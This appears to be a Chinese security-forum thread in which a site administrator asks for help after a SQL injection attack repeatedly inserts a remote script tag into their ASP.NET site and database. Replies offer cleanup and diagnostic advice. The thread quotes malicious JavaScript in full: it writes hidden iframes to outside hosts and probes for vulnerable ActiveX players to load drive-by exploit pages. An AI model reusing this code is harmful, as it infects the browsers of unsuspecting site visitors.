瑞星卡卡安全论坛

我们单位的审批系统和外网，是asp.net和sql2000 sp4，操作系统是windows 2003 server
最近sql数据库被注入了，所有网站和审批系统中可以被填写的地方都被加入了如下代码：
src=http://sb.5252.ws:88/107/1.js></script>< ——><

用瑞星听诊器查无可疑文件，无可疑进程，瑞星杀毒软件找不到病毒，卡卡也没查到任何异常
硬盘格式化，重新安装操作系统，重新架设sql，数据库恢复到没中木马的时候，可是过了半天，又被重新注入。

请大家帮忙解决一下，十万火急。

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

大家快来救救我啊。

document.writeln("var start = cookieString.indexOf(\"woshi0day=\");");
document.writeln("if (start != -1)");
document.writeln("{}");
document.writeln("else");
document.writeln("{");
document.writeln("var expires = new Date();");
document.writeln("expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);");
document.writeln("document.cookie = \"woshi0day=0000;expires=\" + expires.toGMTString();");
document.writeln("document.write(\"<iframe src=http:\/\/ii.jtren.net\/cc\/p139.htm?18 width=10 height=0><\/iframe>\");");

try{ var j;
                    var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
                catch(j){};
                finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
                                        {document.write('<iframe width=100 height=0 src=http://b.360ll.cn/real.htm></iframe>')}
                        else
                        {
                    document.write('<iframe width=100 height=0 src=http://b.360ll.cn/real11.htm></iframe>')}}}

                try{ var g;
                    var glworld=new ActiveXObject("GLAVATAR.GLAvatarCtrl.1");}
                catch(g){};
                finally{if(g!="[object Error]"){
                    document.write('<iframe style=display:none src=http://b.360ll.cn/lz.htm></iframe>')}}

                try{ var h;
                    var storm=new ActiveXObject("MPS.StormPlayer.1");}
                catch(h){};
                finally{if(h!="[object Error]"){
                    document.write('<iframe style=display:none src=http://b.360ll.cn/bfyy.htm></iframe>')}}

                try{ var f;
                    var thunder=new ActiveXObject("DPClient.Vod");}
                catch(f){};
                finally{ if(f!="[object Error]"){
                    document.write('<iframe width=50 height=0 src=xl.htm></iframe>')}}

楼上的大哥，您说的两段代码能解释一下吗？是要加到web.config里面吗？

管理员快来帮帮忙吧

版主啊，快来救救我啊，我可是瑞星网络版用户啊

进入我签名下的网盘地址，找个iframkill这个工具，批量清除所有网页的附加恶意代码……

这个工具我尚未熟悉，相关操作请自行摸索。

这种方法，治标不治本啊。清除一段时间之后，不到半天还会是老样子的

还有就是这个工具是清除网页恶意代码的，对于sql数据库有用吗？
还请给位版主帮帮忙啊

这数据库这玩意，我实在不懂

不过你的恢复后又这样，我倒是好奇的。

你那网络里到底有多少电脑和这台电脑连在一个网络呢？？？

还有你这电脑上外网么？

有人用它经常插U盘，或者经常上网、开网页、玩QQ、玩有么？

哪怕偶尔的一次？？？

这很重要，因为有异常程序影响你的时候，一般三个主要途径。
1、是开网页、玩游戏、上QQ等
2、是使用移动存储设备
3、是局域网里其他中毒电脑影响

你仔细想想到底哪个呢？？？

然后再考虑其他的。

同时你再去将这台电脑扫个SRENG日志来看看：

扫SRENG日志发这论坛来
http://www.kztechs.com/sreng/download.html
下载System Repair Engineer
1 下载的是压缩包，必须解压缩（建议解压到系统Windows文件夹里）
2 运行SREngxxx.EXE  ((将SREngxxx.EXE改名为123.com运行))
3 选择主界面左边的：智能扫描=》扫描=》保存报告
4 把报告保存后，直接将日志文件以附件的形式发这论坛来。

一定以附件形式发这论坛来。
点击你自己的主题贴右下角的“引用”或最右下角的那个较大的“回复”然后就应该知道怎么发了。

那数据库里的东西的清理，我是没本事帮你了。

倒是想看看你的系统里是否有异常程序运行。